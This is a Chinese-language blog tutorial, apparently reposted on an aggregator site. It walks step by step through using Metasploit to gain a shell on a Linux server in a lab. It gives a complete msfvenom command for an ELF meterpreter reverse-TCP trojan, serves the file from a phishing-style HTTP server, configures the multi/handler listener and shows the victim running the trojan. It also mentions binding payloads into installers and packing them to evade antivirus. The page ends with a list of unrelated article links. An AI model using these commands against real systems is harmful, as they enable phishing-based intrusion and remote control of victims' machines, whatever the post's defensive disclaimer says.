当前位置: 首页 > news >正文

MSF 反弹 Shell 实战教程:从生成木马到获取服务器权限

声明:本文仅用于技术交流与安全防御研究,请勿用于非法用途。

一、这篇文章讲什么?

很多新手拿到 MSF(Metasploit Framework)不知道从哪里开始。这篇文章不讲复杂原理,只讲怎么一步步用 MSF 拿到一台 Linux 服务器的权限

你可以把它当成一份 MSF 使用教程,跟着敲命令就能看到效果。

二、环境说明

靶机:CentOS 7(192.168.66.136)
攻击机:Kali Linux(192.168.66.130)

三、核心流程(就三步)

第一步:生成木马 → 第二步:监听等待 → 第三步:让靶机运行木马

四、复现步骤

真实攻防演练中,攻击者不一定会找到 Web 漏洞。钓鱼 + 社会工程学是最常见的突破口——构造一个仿真的网站让受害者访问,诱使受害者下载运行木马。

第一步:在 Kali 上生成木马 payload
# 使用 msfvenom 生成 Linux 反弹 shell(ELF 格式) msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.66.130 LPORT=4444 -f elf -o shell.elf

参数说明:

  • -p linux/x64/meterpreter/reverse_tcp:Linux 64 位的 meterpreter 反向 TCP payload

  • LHOST=192.168.66.130:Kali(攻击机)的 IP

  • LPORT=4444:Kali 上监听的端口

  • -f elf:输出 ELF 可执行文件格式

实际攻击中,攻击者会使用捆绑器(如msfvenom -x)将 payload 注入到正常的 PDF 阅读器或安装包中,或对 ELF 文件进行加壳混淆,以降低杀软查杀率。本文聚焦后渗透阶段,故使用裸 payload 演示。

第二步:布置钓鱼页面,诱导下载

攻击者在 Kali 上搭建一个模拟的网站让靶机访问,点击shell.elf将木马下载到靶机(关闭防火墙)

# Kali 上起一个 HTTP 服务,提供木马下载 python3 -m http.server 2233

第三步:启动 MSF handler 等待回连
# 在 Kali 上启动 MSF 监听 msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.66.130 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > exploit -j # [*] Started reverse TCP handler on 192.168.66.130:4444

第四步:受害者下载并运行木马,在 Kali 上看到 session 建立
# 受害者(靶机的 cai 用户)下载木马elf后执行 chmod +x /home/cai/下载/shell.elf /home/cai/下载/shell.elf &

攻击者现在通过 meterpreter 完全控制了目标机器,权限为运行木马的cai(普通用户)。

http://www.gsyq.cn/news/1644386.html

相关文章:

  • Redis——分布式锁
  • 计组面试--h自用
  • Lua--协同线程与文件IO
  • 小红书博主都在偷偷用的AI工具,不用懂代码就能自动运营
  • 智能办公本X2:端侧AI驱动的手写语音协同工作流
  • Lua--基础入门
  • 2000+机柜怎么管?数据中心U位资产管理方案拆解
  • 完整RAG工作流达成!手把手教你使用NAS部署企业生产级AI知识库
  • 库存并发安全控制的架构设计
  • 谷歌两款AI学习工具大揭秘:NotebookLM与Learn About谁更胜一筹?
  • 别再硬写提示词了!LangChain PromptTemplate从入门到实战
  • GEO代理接单后总部负责落地吗
  • PowerShell 路径规则详解:从基础到高级
  • 2026杭州初中毕业女生暑假学什么好?选对方向比努力更重要
  • 剪映专业版教程:制作西施跳广场舞效果
  • MLflow在LLM评估中的工程实践:实现可追溯、可比较、可归因的模型管理
  • 06-高级模式与实战项目——01. Render Props - 共享渲染逻辑
  • TFT-LCD 驱动架构对比:4 种 Cs 存储电容布局的优缺点与选型指南
  • 私密科普:女性经后淋漓不尽,别当成普通经期残留
  • 机房故障换机后应急验证:24 小时 SpeedCE 点检 SOP
  • AI编程助手实战指南:从原理到应用,GitHub Copilot与Cursor深度测评
  • 白话MVP
  • Cline 配置 Claude Sonnet 5 实战指南:思考深度调优与切换 Fable 5 的时机
  • Redis--Redis分布式系统的原理与实操
  • 图最短路评测:Dijkstra 对了,也可能用错场景
  • 74LS73 异步计数器设计实战:2片芯片实现4位二进制与8421BCD电路对比
  • [特殊字符] Git 协作指南
  • Claude Code的完美国产替代小米 MiMo Code安装指南
  • CameraGraph™全域相机拓扑推理引擎 视频孪生跨镜目标连续追踪核心支撑 空间相机关系张量建模:根治跨镜头目标ID跳变、身份混淆底层算法拆解
  • 2025反爬系统深度解析:从Canvas指纹到AI行为画像的攻防实战